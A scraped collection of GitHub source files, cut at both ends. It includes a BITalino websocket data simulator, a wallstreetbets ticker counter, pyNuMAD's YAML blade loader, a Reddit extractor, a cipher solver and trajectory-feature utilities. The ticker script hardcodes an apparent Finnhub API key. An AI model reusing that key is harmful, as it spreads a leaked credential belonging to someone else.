'\"'+labels[idx]+'\":'+tostring(data[:,i])+','\r\n res = res[:-1]+\"}\"\r\n if len(cl)>0: cl[-1].write_message(res)\r\n except:\r\n traceback.print_exc()\r\n os._exit(0)\r\n\r\n\r\ndef printHi():\r\n global tflag\r\n tflag = True\r\n\r\ndef BITalino_simulate(mac_addr, ch_mask, srate, labels):\r\n #labels = [\"'nSeq'\", \"'I1'\", \"'I2'\", \"'O1'\", \"'O2'\", \"'A1'\", \"'A2'\", \"'A3'\", \"'A4'\", \"'A5'\", \"'A6'\"]\r\n global tflag\r\n ch_mask = numpy.array(ch_mask)-1\r\n DATA = numpy.loadtxt('D:/github/wring/PZT_3_2.txt')\r\n dsrate = 1000\r\n buffer_size = 250\r\n xi = 0\r\n xf = buffer_size\r\n data = DATA[xi:xf,:]\r\n xi = xf\r\n maxdata = 361000\r\n firstcall = True\r\n update_rate = 1.0*buffer_size/srate\r\n# update_rate = 0.250\r\n# update_rate = 2\r\n\r\n print(update_rate)\r\n try:\r\n print(\"ch_mask: \", ch_mask)\r\n print(\"srate: \", srate)\r\n print(\"labels:\", labels)\r\n cols = numpy.arange(len(ch_mask)+5)\r\n print(\"cols:\", cols)\r\n while (1):\r\n # Create timer\r\n if firstcall or tflag:\r\n threading.Timer(update_rate, printHi).start()\r\n\r\n tflag = False\r\n firstcall = False\r\n\r\n data = numpy.roll(data, -buffer_size, axis = 0)\r\n xf = (xf % maxdata) + buffer_size\r\n data_buffer = DATA[xi:xf,:]\r\n \r\n xi = xf % maxdata\r\n data[-buffer_size:,:] = data_buffer\r\n\r\n\r\n\r\n res = \"{\"\r\n for i in cols:\r\n idx = i\r\n if (i>4): idx=ch_mask[i-5]+1\r\n res += '\"'+labels[idx]+'\":'+tostring(data[:,i])+','\r\n res = res[:-1]+\"}\"\r\n if len(cl)>0: cl[-1].write_message(res)\r\n except:\r\n traceback.print_exc()\r\n os._exit(0) \r\n\r\n\r\napp = web.Application([(r'/', SocketHandler)])\r\n\r\nif __name__ == '__main__':\r\n home = expanduser(\"~\") + '/ServerBIT'\r\n print(home)\r\n try:\r\n with open(home+'/config.json') as data_file:\r\n config = json.load(data_file)\r\n print(config)\r\n except:\r\n with open('config.json') as data_file:\r\n config = json.load(data_file)\r\n os.mkdir(home)\r\n with open(home+'/config.json', 'w') as outfile:\r\n json.dump(config, outfile)\r\n signal.signal(signal.SIGINT, signal_handler)\r\n app.listen(config['port'])\r\n print('LISTENING')\r\n# thread.start_new_thread(BITalino_handler, (config['device'],config['channels'],config['sampling_rate'], config['labels']))\r\n thread.start_new_thread(BITalino_simulate, (config['device'],config['channels'],config['sampling_rate'], 
config['labels']))\r\n ioloop.IOLoop.instance().start()\r\n \r\n","repo_name":"malfarasplux/sigaloud","sub_path":"soundrebound/ServerBIT.py","file_name":"ServerBIT.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5161540625","text":"#!/usr/bin/env python3\n\nclass MyPoint(object):\n def __init__(self, x=0, y=0):\n self.__x = x\n self.__y = y\n\n def __str__(self):\n return \"(\" + str(self.__x) + \", \" + str(self.__y) + \")\"\n\ndef main():\n r1 = MyPoint(3, 4)\n r2 = MyPoint()\n r3 = MyPoint(1)\n r4 = MyPoint(y = 10)\n print(r1)\n print()\n print(r2)\n print()\n print(r3)\n print()\n print(r4)\n\nmain()\n","repo_name":"DiamondBond/labs","sub_path":"py/lab9/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27860056459","text":"from psaw import PushshiftAPI\nimport datetime\nimport finnhub\nimport pprint\n\napi = PushshiftAPI()\ndt = datetime.datetime.today()\ndate = int(datetime.datetime(dt.year,dt.month,dt.day).timestamp())\n#Need to do env when we move it to backend \nfinnhub_client = finnhub.Client(api_key=\"c371jnaad3ib6g7egdag\")\n\n\narticles = list(api.search_submissions(after = date,subreddit = 'wallstreetbets', filter =['url','author', 'title', 'subreddit'] ))\nredditTickers ={}\nfor article in articles:\n words = article.title.split()\n tickers= list(filter(lambda word:word.lower().startswith('$'), words))\n\n if len(tickers)>0:\n for ticker in tickers:\n if(ticker.upper()[1:5] not in redditTickers):\n redditTickers[ticker.upper()[1:5]] = 1\n else:\n redditTickers[ticker.upper()[1:5]]+=1\n\nredditTicker= {}\nfor key, value in redditTickers.items():\n if key.isalpha():\n redditTicker[key]=value\n\nstockTickers = dict(sorted(redditTicker.items(), key=lambda x: x[1],reverse=True))\nstockVal = {}\nfor key in stockTickers.items():\n value = finnhub_client.quote(key)\n if (value['t'] !=0):\n stockVal[key] = value\n \n#Formats dictionary in a nice easy to read form\npprint.pprint(stockVal)","repo_name":"adshayanB/redditStonks","sub_path":"stonks.py","file_name":"stonks.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72671470513","text":"import yaml\nimport numpy as np\nimport logging\nfrom scipy.stats import mode\n\nfrom pynumad.utils.misc_utils import (\n LARCetaT,\n LARCetaL,\n _parse_data,\n full_keys_from_substrings,\n)\nfrom pynumad.io.airfoil_to_xml import airfoil_to_xml\nfrom pynumad.utils.interpolation import interpolator_wrap\nfrom pynumad.objects.component import Component\nfrom pynumad.objects.airfoil import Airfoil\nfrom pynumad.objects.material import Material\nfrom pynumad.objects.definition import Definition\n\n\ndef yaml_to_blade(blade, filename: str, write_airfoils: bool = False):\n \"\"\"\n This method writes blade information from a .yaml file to a Blade object.\n The yaml file is expected to be formatted according to the WindIO ontology.\n See https://windio.readthedocs.io/en/stable/source/turbine.html.\n\n Parameters\n ----------\n blade : Blade\n filename : string\n path to .yaml file\n write_airfoils : bool\n Set true to write airfoil files while reading in data. 
Defaults to false.\n\n Returns\n -------\n blade : Blade\n input blade object populated with yaml data\n \"\"\"\n\n # Read in yaml file as a nested dictionary\n with open(filename) as blade_yaml:\n # data = yaml.load(blade_yaml,Loader=yaml.FullLoader)\n data = yaml.load(blade_yaml, Loader=yaml.Loader)\n\n # initialize definition\n definition = Definition()\n blade.definition = definition\n\n # Obtain blade outer shape bem\n blade_outer_shape_bem = data[\"components\"][\"blade\"][\"outer_shape_bem\"]\n\n # obtain hub outer shape bem\n try:\n hub_outer_shape_bem = data[\"components\"][\"hub\"][\"outer_shape_bem\"]\n except KeyError:\n # older versions of wind ontology do not have 'outer_shape_bem' subsection for hub data\n hub_outer_shape_bem = data[\"components\"][\"hub\"]\n\n # obtain blade internal structure\n blade_internal_structure = data[\"components\"][\"blade\"][\"internal_structure_2d_fem\"]\n\n # obtain airfoil data\n af_data = data[\"airfoils\"]\n\n # obtain material data\n mat_data = data[\"materials\"]\n\n ### STATIONS / AIRFOILS\n _add_stations(\n definition,\n blade_outer_shape_bem,\n hub_outer_shape_bem,\n af_data,\n filename,\n write_airfoils,\n )\n blade.ispan = definition.ispan\n\n ### MATERIALS\n _add_materials(definition, mat_data)\n\n ## Blade Components\n\n # Update \"grid\" and \"values\" keys to cover the whole span of the blade\n blade_internal_structure = update_internal_structure(\n blade_internal_structure, blade_outer_shape_bem\n )\n\n blade_structure_dict = {\n blade_internal_structure[\"layers\"][i][\"name\"].lower(): blade_internal_structure[\n \"layers\"\n ][i]\n for i in range(len(blade_internal_structure[\"layers\"]))\n }\n # Spar caps\n _add_spar_caps(definition, blade_structure_dict)\n\n # TE Bands\n _add_te_bands(definition, blade_structure_dict)\n\n # LE Bands\n _add_le_bands(definition, blade_structure_dict)\n\n ### COMPONENTS\n _add_components(definition, blade_internal_structure, blade_structure_dict)\n\n blade.update_blade()\n # save(blade_name)\n # BladeDef_to_NuMADfile(obj,numad_name,matdb_name,numad_af_folder)\n return blade\n\n\ndef _add_stations(\n definition,\n blade_outer_shape_bem,\n hub_outer_shape_bem,\n af_data,\n file: str,\n write_airfoils,\n):\n # Obtaining some parameters not explicitly given in YAML file\n L = np.ceil(blade_outer_shape_bem[\"reference_axis\"][\"z\"][\"values\"][-1])\n R = L + hub_outer_shape_bem[\"diameter\"] / 2\n L = R - hub_outer_shape_bem[\"diameter\"] / 2\n definition.span = np.multiply(\n np.transpose(blade_outer_shape_bem[\"chord\"][\"grid\"]), L\n )\n definition.ispan = definition.span\n\n # Aerodynamic properties\n # using interp because yaml can have different r/R for twist and chord\n temp_x = np.transpose(blade_outer_shape_bem[\"twist\"][\"grid\"])\n temp_y = blade_outer_shape_bem[\"twist\"][\"values\"]\n definition.degreestwist = (\n interpolator_wrap(np.multiply(temp_x, L), np.transpose(temp_y), definition.span)\n * 180.0\n / np.pi\n )\n definition.chord = interpolator_wrap(\n np.multiply(np.transpose(blade_outer_shape_bem[\"chord\"][\"grid\"]), L),\n np.transpose(blade_outer_shape_bem[\"chord\"][\"values\"]),\n definition.span,\n )\n af_dir_names = []\n for i in range(len(af_data)):\n af_dir_names.append(af_data[i][\"name\"])\n numstations = len(blade_outer_shape_bem[\"airfoil_position\"][\"labels\"])\n tc = [None] * numstations\n aero_cent = [None] * numstations\n definition.stations = []\n for i in range(numstations):\n _, _, iaf_temp = np.intersect1d(\n 
blade_outer_shape_bem[\"airfoil_position\"][\"labels\"][i],\n af_dir_names,\n \"stable\",\n return_indices=True,\n )\n IAF = iaf_temp[0] # Expect only one index of intersection\n tc[i] = af_data[IAF][\"relative_thickness\"]\n tc_xL = blade_outer_shape_bem[\"airfoil_position\"][\"grid\"][i]\n aero_cent[i] = af_data[IAF][\"aerodynamic_center\"]\n x = np.array(af_data[IAF][\"coordinates\"][\"x\"], dtype=float)\n y = np.array(af_data[IAF][\"coordinates\"][\"y\"], dtype=float)\n xf_coords = np.stack((x, y), 1)\n\n # find coordinate direction (clockwise or counter-clockwise) Winding\n # Number. clockwise starting at (1,0) is correct\n with np.errstate(divide=\"ignore\", invalid=\"ignore\"):\n if (\n np.nanmean(np.gradient(np.arctan(xf_coords[:, 1] / xf_coords[:, 0])))\n > 0\n ):\n xf_coords = np.flipud(xf_coords)\n\n if write_airfoils:\n import os\n\n out_folder = \"yaml2BladeDef_\" + file.replace(\".yaml\", \"\")\n # blade_name = out_folder + '/' + file.replace('.yaml','') + '_definition.mat'\n # matdb_name =...\n # numade_name =...\n\n # Creating folders\n os.makedirs(out_folder + \"/af_coords/\", exist_ok=True)\n # os.makedirs(out_folder+'/af_polars/', exist_ok = True)\n os.makedirs(out_folder + \"/airfoil/\", exist_ok=True)\n airfoil_to_xml(\n xf_coords,\n blade_outer_shape_bem[\"airfoil_position\"][\"labels\"][i],\n out_folder\n + \"/af_coords/\"\n + blade_outer_shape_bem[\"airfoil_position\"][\"labels\"][i]\n + \".txt\",\n )\n\n ref = blade_outer_shape_bem[\"airfoil_position\"][\"labels\"][i]\n af = Airfoil(coords=xf_coords, reference=ref)\n af.resample(spacing=\"half-cosine\")\n definition.add_station(af, tc_xL * L)\n\n definition.percentthick = np.multiply(\n interpolator_wrap(\n np.multiply(blade_outer_shape_bem[\"airfoil_position\"][\"grid\"], L),\n tc,\n definition.span,\n ),\n 100,\n )\n definition.aerocenter = interpolator_wrap(\n np.multiply(blade_outer_shape_bem[\"airfoil_position\"][\"grid\"], L),\n aero_cent,\n definition.span,\n )\n definition.chordoffset = interpolator_wrap(\n np.multiply(np.transpose(blade_outer_shape_bem[\"pitch_axis\"][\"grid\"]), L),\n np.transpose(blade_outer_shape_bem[\"pitch_axis\"][\"values\"]),\n definition.span,\n )\n definition.natural_offset = 0\n definition.prebend = interpolator_wrap(\n np.multiply(\n np.transpose(blade_outer_shape_bem[\"reference_axis\"][\"x\"][\"grid\"]), L\n ),\n np.transpose(blade_outer_shape_bem[\"reference_axis\"][\"x\"][\"values\"]),\n definition.span,\n )\n definition.sweep = interpolator_wrap(\n np.multiply(\n np.transpose(blade_outer_shape_bem[\"reference_axis\"][\"y\"][\"grid\"]), L\n ),\n np.transpose(blade_outer_shape_bem[\"reference_axis\"][\"y\"][\"values\"]),\n definition.span,\n )\n\n # for i in range(len(tc)):\n # afc = AirfoilDef(out_folder +\n # '/af_coords/' +\n # blade_outer_shape_bem['airfoil_position']['labels'][i] +\n # '.txt')\n # definition.add_station(afc,np.multiply(tc_xL[i],L))\n\n # NOTE nothing happens to afc? Tentatively ignoring...\n # If i return to this make sure to listify the afcs\n ### AIRFOILS\n # for i in range(len(tc)):\n # afc = AirfoilDef(out_folder + '/af_coords/' +\n # blade_outer_shape_bem['airfoil_position']['labels'][i] +\n # '.txt')\n # definition.add_station(afc,np.multiply(tc_xL[i],L))\n # afc.resample #NOTE afc isn't used after this... 
why resample?\n return\n\n\ndef _add_materials(definition, material_data):\n materials_dict = dict()\n for i in range(len(material_data)):\n cur_mat = Material()\n cur_mat.name = material_data[i][\"name\"]\n if material_data[i][\"orth\"] == 1:\n cur_mat.type = \"orthotropic\"\n else:\n cur_mat.type = \"isotropic\"\n # Add ply thickness option if ply thickness exists in yaml\n try:\n cur_mat.layerthickness = material_data[i][\"ply_t\"] * 1000\n except KeyError:\n msg = \"material ply thickness \" + \\\n material_data[i][\"name\"] + \\\n \"not defined, assuming 1 mm thickness\"\n logging.debug(msg)\n cur_mat.layerthickness = 1\n\n finally:\n pass\n\n # first\n cur_mat.uts = _parse_data(material_data[i][\"Xt\"])\n cur_mat.ucs = -_parse_data(material_data[i][\"Xc\"])\n cur_mat.uss = _parse_data(material_data[i][\"S\"])\n cur_mat.xzit = 0.3\n cur_mat.xzic = 0.25\n cur_mat.yzit = 0.3\n cur_mat.yzic = 0.25\n try:\n cur_mat.g1g2 = material_data[i].get(\"GIc\", 0) / material_data[i].get(\n \"GIIc\", 0\n )\n except ZeroDivisionError:\n cur_mat.g1g2 = np.nan\n if \"alp0\" in material_data[i]:\n cur_mat.alp0 = _parse_data(material_data[i][\"alp0\"])\n cur_mat.etat = LARCetaT(cur_mat.alp0)\n else:\n cur_mat.alp0 = None\n cur_mat.etat = None\n try:\n # test if property is a list\n material_data[i][\"E\"] + []\n except TypeError:\n cur_mat.ex = _parse_data(material_data[i][\"E\"])\n cur_mat.ey = _parse_data(material_data[i][\"E\"])\n cur_mat.ez = _parse_data(material_data[i][\"E\"])\n cur_mat.gxy = _parse_data(material_data[i][\"G\"])\n cur_mat.gxz = _parse_data(material_data[i][\"G\"])\n cur_mat.gyz = _parse_data(material_data[i][\"G\"])\n cur_mat.prxy = _parse_data(material_data[i][\"nu\"])\n cur_mat.prxz = _parse_data(material_data[i][\"nu\"])\n cur_mat.pryz = _parse_data(material_data[i][\"nu\"])\n cur_mat.etal = LARCetaL(cur_mat.uss, cur_mat.ucs, cur_mat.alp0)\n else:\n cur_mat.ex = _parse_data(material_data[i][\"E\"][0])\n cur_mat.ey = _parse_data(material_data[i][\"E\"][1])\n cur_mat.ez = _parse_data(material_data[i][\"E\"][2])\n cur_mat.gxy = _parse_data(material_data[i][\"G\"][0])\n cur_mat.gxz = _parse_data(material_data[i][\"G\"][1])\n cur_mat.gyz = _parse_data(material_data[i][\"G\"][2])\n cur_mat.prxy = _parse_data(material_data[i][\"nu\"][0])\n cur_mat.prxz = _parse_data(material_data[i][\"nu\"][1])\n cur_mat.pryz = _parse_data(material_data[i][\"nu\"][2])\n cur_mat.etal = LARCetaL(cur_mat.uss[0], cur_mat.ucs[1], cur_mat.alp0)\n try:\n cur_mat.m = material_data[i][\"m\"]\n except KeyError:\n msg = f\"No fatigue exponent found for material: {material_data[i]['name']}\"\n logging.debug(msg)\n cur_mat.density = material_data[i][\"rho\"]\n # cur_mat.dens = mat_data[i]['rho']\n cur_mat.drydensity = material_data[i][\"rho\"]\n if (\n \"description\" in material_data[i].keys()\n and \"source\" in material_data[i].keys()\n ):\n desc_sourc = [\n material_data[i][\"description\"],\n \", \",\n material_data[i][\"source\"],\n ]\n cur_mat.reference = \"\".join(desc_sourc)\n else:\n cur_mat.reference = []\n\n materials_dict[cur_mat.name] = cur_mat\n definition.materials = materials_dict\n return\n\n\ndef _add_components(definition, blade_internal_structure, blade_structure_dict):\n N_layer_comp = len(blade_internal_structure[\"layers\"])\n component_list = list()\n for i in range(N_layer_comp):\n i_component_data = blade_internal_structure[\"layers\"][i]\n cur_comp = Component()\n cur_comp.group = 0\n cur_comp.name = i_component_data[\"name\"]\n # comp['material'] = 
blade_internal_structure['layers']{i}['material'];\n # mat_names = [mat.name for mat in definition.materials]\n # C,IA,IB = np.intersect1d(mat_names,i_component_data['material'],return_indices=True)\n cur_comp.materialid = i_component_data[\"material\"]\n try:\n cur_comp.fabricangle = np.mean(\n i_component_data[\"fiber_orientation\"][\"values\"]\n )\n finally:\n pass\n if \"spar\" in i_component_data[\"name\"].lower():\n cur_comp.imethod = \"pchip\"\n else:\n cur_comp.imethod = \"linear\"\n # cur_comp.control_points[:,0] = np.transpose(i_component_data['thickness']['grid'])\n cptemp1 = np.transpose(i_component_data[\"thickness\"][\"grid\"])\n temp_n_layer = (\n np.multiply(np.transpose(i_component_data[\"thickness\"][\"values\"]), 1000.0)\n / definition.materials[cur_comp.materialid].layerthickness\n )\n I_round_up = np.flatnonzero((temp_n_layer > 0.05) & (temp_n_layer < 0.5))\n cptemp2 = np.round(\n np.multiply(np.transpose(i_component_data[\"thickness\"][\"values\"]), 1000.0)\n / definition.materials[cur_comp.materialid].layerthickness\n )\n cur_comp.control_points = np.stack((cptemp1, cptemp2), axis=1)\n # if I_round_up.size > 0:\n # cur_comp.control_points[I_round_up,1] = 1 # increase n_layers from 0 to 1 for 0.05 0:\n for key in key_list:\n component_dict[key].hpextents = [\"b\"]\n component_dict[key].lpextents = [\"b\"]\n component_dict[key].group = 1\n elif len(key_list) == 0:\n raise ValueError(\"No fore web layers found found\")\n\n key_list = full_keys_from_substrings(component_dict.keys(), [\"web\", \"aft\"]) # Try 1\n if len(key_list) == 0:\n key_list = full_keys_from_substrings(component_dict.keys(), [\"web\", \"0\"]) # Try 2\n if len(key_list) == 0:\n key_list = full_keys_from_substrings(\n component_dict.keys(), [\"web\", \"rear\"]\n ) # Try 3\n\n if len(key_list) > 0:\n for key in key_list:\n component_dict[key].hpextents = [\"c\"]\n component_dict[key].lpextents = [\"c\"]\n component_dict[key].group = 2\n elif len(key_list) == 0:\n raise ValueError(\"No rear web layers found found\")\n\n ### add components to blade\n definition.components = component_dict\n return\n\n\ndef update_internal_structure(blade_internal_structure, blade_outer_shape_bem):\n bladeParts = [\"layers\", \"webs\"]\n # Make sure each definition.ispan has layer thicknesses and widths\n fullSpanGrid = np.array(blade_outer_shape_bem[\"chord\"][\"grid\"])\n nStations = len(fullSpanGrid)\n keysToModify = {\n \"offset_y_pa\",\n \"thickness\",\n \"fiber_orientation\",\n \"width\",\n \"start_nd_arc\",\n \"end_nd_arc\",\n }\n for part_name in bladeParts:\n N_layer_comp = len(blade_internal_structure[part_name])\n for currentLayer in range(N_layer_comp):\n layerKeys = set(blade_internal_structure[part_name][currentLayer].keys())\n\n for currentKey in keysToModify.intersection(layerKeys):\n grid = blade_internal_structure[part_name][currentLayer][currentKey][\n \"grid\"\n ]\n values = blade_internal_structure[part_name][currentLayer][currentKey][\n \"values\"\n ]\n startStationLoc = grid[0]\n endStationLoc = grid[-1]\n\n subSpanGridIndex = np.where(\n (fullSpanGrid >= startStationLoc) & (fullSpanGrid <= endStationLoc)\n )[0]\n\n # iterpolate fullSpanGrid locations onto layer grid defined in the yamle file for the layer\n subSpanValues = interpolator_wrap(\n grid, values, fullSpanGrid[subSpanGridIndex], \"pchip\"\n )\n fullSpanValues = np.zeros(nStations)\n\n fullSpanValues[subSpanGridIndex] = subSpanValues\n\n # Reset\n blade_internal_structure[part_name][currentLayer][currentKey][\n \"grid\"\n ] = fullSpanGrid\n 
blade_internal_structure[part_name][currentLayer][currentKey][\n \"values\"\n ] = fullSpanValues\n return blade_internal_structure\n\n\ndef _add_spar_caps(definition, blade_structure_dict):\n sparCapKeys = full_keys_from_substrings(blade_structure_dict.keys(), [\"spar\"])\n if len(sparCapKeys) != 2:\n raise ValueError(\"Incorrect number of spar cap components\")\n\n for iSparCap in range(2):\n if \"suc\" in blade_structure_dict[sparCapKeys[iSparCap]][\"side\"].lower():\n lpSideIndex = iSparCap\n if \"pres\" in blade_structure_dict[sparCapKeys[iSparCap]][\"side\"].lower():\n hpSideIndex = iSparCap\n\n definition.sparcapwidth_lp = (\n blade_structure_dict[sparCapKeys[lpSideIndex]][\"width\"][\"values\"] * 1000\n )\n try:\n definition.sparcapoffset_lp = (\n blade_structure_dict[sparCapKeys[lpSideIndex]][\"offset_y_pa\"][\"values\"]\n * 1000\n )\n except KeyError:\n definition.sparcap_start_nd_arc = blade_structure_dict[\n sparCapKeys[lpSideIndex]\n ][\"start_nd_arc\"][\"values\"]\n definition.sparcap_end_nd_arc = blade_structure_dict[sparCapKeys[lpSideIndex]][\n \"end_nd_arc\"\n ][\"values\"]\n\n definition.sparcapwidth_hp = (\n blade_structure_dict[sparCapKeys[hpSideIndex]][\"width\"][\"values\"] * 1000\n )\n try:\n definition.sparcapoffset_hp = (\n blade_structure_dict[sparCapKeys[hpSideIndex]][\"offset_y_pa\"][\"values\"]\n * 1000\n )\n except KeyError:\n definition.sparcap_start_nd_arc = blade_structure_dict[\n sparCapKeys[hpSideIndex]\n ][\"start_nd_arc\"][\"values\"]\n definition.sparcap_end_nd_arc = blade_structure_dict[sparCapKeys[hpSideIndex]][\n \"end_nd_arc\"\n ][\"values\"]\n return definition\n\n\ndef _add_te_bands(definition, blade_structure_dict):\n teReinfKeys = full_keys_from_substrings(blade_structure_dict.keys(), [\"te\", \"reinf\"])\n if len(teReinfKeys) == 1:\n definition.teband = (\n blade_structure_dict[teReinfKeys[0]][\"width\"][\"values\"] * 1000 / 2\n )\n elif len(teReinfKeys) == 2:\n definition.teband = (\n (\n blade_structure_dict[teReinfKeys[0]][\"width\"][\"values\"]\n + blade_structure_dict[teReinfKeys[1]][\"width\"][\"values\"]\n )\n * 1000\n / 2\n )\n else:\n raise ValueError(\"Unknown number of TE reinforcements\")\n return definition\n\n\ndef _add_le_bands(definition, blade_structure_dict):\n leReinfKeys = full_keys_from_substrings(blade_structure_dict.keys(), [\"le\", \"reinf\"])\n if len(leReinfKeys) == 1:\n definition.leband = (\n blade_structure_dict[leReinfKeys[0]][\"width\"][\"values\"] * 1000 / 2\n )\n elif len(leReinfKeys) == 2:\n definition.leband = (\n (\n blade_structure_dict[leReinfKeys[0]][\"width\"][\"values\"]\n + blade_structure_dict[leReinfKeys[1]][\"width\"][\"values\"]\n )\n * 1000\n / 2\n )\n else:\n raise ValueError(\"Invalid number of LE reinforcements\")\n return definition\n","repo_name":"sandialabs/pyNuMAD","sub_path":"src/pynumad/io/yaml_to_blade.py","file_name":"yaml_to_blade.py","file_ext":"py","file_size_in_byte":24947,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"18622752633","text":"import os\nfrom dataclasses import asdict, dataclass, field\n\nimport pandas as pd\nimport praw\n\nfrom tweeran.nlp import clean, is_text_relevant\n\nMAX_ENTRIES_DEFAULT = 10000\n\nFEATURES_SUBMISSION = [\"id\", \"created_utc\", \"author\", \"ups\", \"downs\",\n \"view_count\", \"score\", \"subreddit\", \"num_comments\",\n \"title\", \"selftext\"]\nFEATURES_COMMENT = [\"id\", \"created_utc\", \"author\", \"body\", \"score\"]\nFEATURES_USER = [\"id\", \"created_utc\", \"name\", 
\"comment_karma\", \"is_gold\"]\n\n\n@dataclass\nclass RedditExtractionResult:\n submissions: pd.DataFrame\n comments: pd.DataFrame\n users: pd.DataFrame\n\n\n@dataclass\nclass RedditClientConfig:\n username: str | None = field(default=os.getenv(\"REDDIT_USERNAME\"))\n password: str | None = field(default=os.getenv(\"REDDIT_PASSWORD\"))\n client_id: str | None = field(default=os.getenv(\"REDDIT_CLIENTID\"))\n client_secret: str | None = field(default=os.getenv(\"REDDIT_CLIENTSECRET\"))\n\n\nclass RedditExtractionManager:\n client: praw.Reddit\n subreddits: list[str]\n event_wikidata_id: str\n max_entries: int\n\n def __init__(\n self,\n subreddits: list[str],\n event_wikidata_id: str,\n max_entries: int = MAX_ENTRIES_DEFAULT,\n client_config: RedditClientConfig = RedditClientConfig()\n ):\n self.subreddits = subreddits\n self.event_wikidata_id = event_wikidata_id\n self.max_entries = max_entries\n self.client = praw.Reddit(\n **asdict(client_config), user_agent=\"tweener\")\n\n def run(self) -> RedditExtractionResult:\n comments = []\n submissions = []\n submissions_ids: set[str] = set()\n usernames: set[str] = set()\n\n for subreddit_name in self.subreddits:\n subreddit = self.client.subreddit(subreddit_name)\n for s in subreddit.top(limit=self.max_entries):\n if (\n not is_text_relevant(self.event_wikidata_id, s.title) and\n not is_text_relevant(self.event_wikidata_id, s.selftext)\n ):\n continue\n submissions.append({f: clean(getattr(s, f))\n for f in FEATURES_SUBMISSION})\n submissions_ids.add(s.id)\n usernames.add(s.author)\n\n for c in subreddit.comments(limit=self.max_entries):\n if c.submission.id not in submissions_ids:\n continue\n comments.append({f: clean(getattr(c, f))\n for f in FEATURES_COMMENT})\n usernames.add(c.author)\n\n users = []\n for u in usernames:\n if u is None:\n continue\n result = self.client.redditor(u)\n if result is None:\n continue\n try:\n users.append({f: clean(getattr(result, f))\n for f in FEATURES_USER})\n except Exception as e:\n print(result)\n raise e\n\n return RedditExtractionResult(\n submissions=pd.DataFrame(submissions, columns=FEATURES_SUBMISSION),\n comments=pd.DataFrame(comments, columns=FEATURES_COMMENT),\n users=pd.DataFrame(users, columns=FEATURES_USER))\n","repo_name":"marinoandrea/tweeran","sub_path":"tweeran/extraction/reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70274895793","text":"import sys\nfrom string import ascii_uppercase, digits, punctuation\n\n#cipher dict = {cipher : alphanum}\n\ndef cipher_shift(shift):\n cipher_key = {}\n alphanum = ascii_uppercase + digits\n cipher = alphanum[shift % len(alphanum):] + alphanum[:shift % len(alphanum)]\n i = 0\n while i < len(alphanum):\n cipher_key[cipher[i]] = alphanum[i]\n i += 1\n return cipher_key\n\ndef decode_text(line, shift):\n decoded = []\n for word in line:\n decoded_word = []\n for l in word:\n if l in punctuation:\n decoded_word.append(l)\n continue\n decoded_word.append(shift[l])\n decoded.append(''.join(decoded_word))\n return ' '.join(decoded)\n\ndef main():\n alphanum = ascii_uppercase + digits\n encoded_text = []\n shift = None\n for line in sys.stdin:\n encoded = line.strip().split()\n if shift == None:\n for word in encoded:\n if len(word) == 3:\n i = 0\n while i < len(alphanum) and alphanum[i] != word[0]:\n i += 1\n shift = cipher_shift(i - 19)\n decoded_and = ''\n for l in word:\n if l not in punctuation:\n decoded_and += 
shift[l]\n if decoded_and != 'THE':\n shift = None\n continue\n else:\n break\n if not shift:\n encoded_text.append(encoded)\n continue\n if encoded_text:\n for e in encoded_text:\n print (decode_text(e, shift))\n encoded_text = None\n print (decode_text(encoded, shift))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jamesoneill54/programming_2","sub_path":"bucketlist/cipher_122.py","file_name":"cipher_122.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5401660874","text":"import torch\nimport torch.nn.functional as F\n\nimport tbsim.dynamics as dynamics\nimport tbsim.utils.tensor_utils as TensorUtils\nfrom tbsim import dynamics as dynamics\nfrom tbsim.configs.base import ExperimentConfig\n\n\ndef get_agent_masks(raw_type):\n \"\"\"\n PERCEPTION_LABELS = [\n \"PERCEPTION_LABEL_NOT_SET\",\n \"PERCEPTION_LABEL_UNKNOWN\",\n \"PERCEPTION_LABEL_DONTCARE\",\n \"PERCEPTION_LABEL_CAR\",\n \"PERCEPTION_LABEL_VAN\",\n \"PERCEPTION_LABEL_TRAM\",\n \"PERCEPTION_LABEL_BUS\",\n \"PERCEPTION_LABEL_TRUCK\",\n \"PERCEPTION_LABEL_EMERGENCY_VEHICLE\",\n \"PERCEPTION_LABEL_OTHER_VEHICLE\",\n \"PERCEPTION_LABEL_BICYCLE\",\n \"PERCEPTION_LABEL_MOTORCYCLE\",\n \"PERCEPTION_LABEL_CYCLIST\",\n \"PERCEPTION_LABEL_MOTORCYCLIST\",\n \"PERCEPTION_LABEL_PEDESTRIAN\",\n \"PERCEPTION_LABEL_ANIMAL\",\n \"AVRESEARCH_LABEL_DONTCARE\",\n ]\n \"\"\"\n veh_mask = (raw_type >= 3) & (raw_type <= 13)\n ped_mask = (raw_type == 14) | (raw_type == 15)\n # veh_mask = veh_mask | ped_mask\n # ped_mask = ped_mask * 0\n return veh_mask, ped_mask\n\n\ndef get_dynamics_types(veh_mask, ped_mask):\n dyn_type = torch.zeros_like(veh_mask)\n dyn_type += dynamics.DynType.UNICYCLE * veh_mask\n dyn_type += dynamics.DynType.DI * ped_mask\n return dyn_type\n\n\ndef raw_to_features(batch_raw):\n \"\"\" map raw src into features of dim 21 \"\"\"\n raw_type = batch_raw[\"raw_types\"]\n pos = batch_raw[\"history_positions\"]\n vel = batch_raw[\"history_velocities\"]\n yaw = batch_raw[\"history_yaws\"]\n mask = batch_raw[\"history_availabilities\"]\n\n veh_mask, ped_mask = get_agent_masks(raw_type)\n\n # all vehicles, cyclists, and motorcyclists\n feature_veh = torch.cat((pos, vel, torch.cos(yaw), torch.sin(yaw)), dim=-1)\n\n # pedestrians and animals\n ped_feature = torch.cat(\n (pos, vel, vel * torch.sin(yaw), vel * torch.cos(yaw)), dim=-1\n )\n\n feature = feature_veh * veh_mask.view(\n [*raw_type.shape, 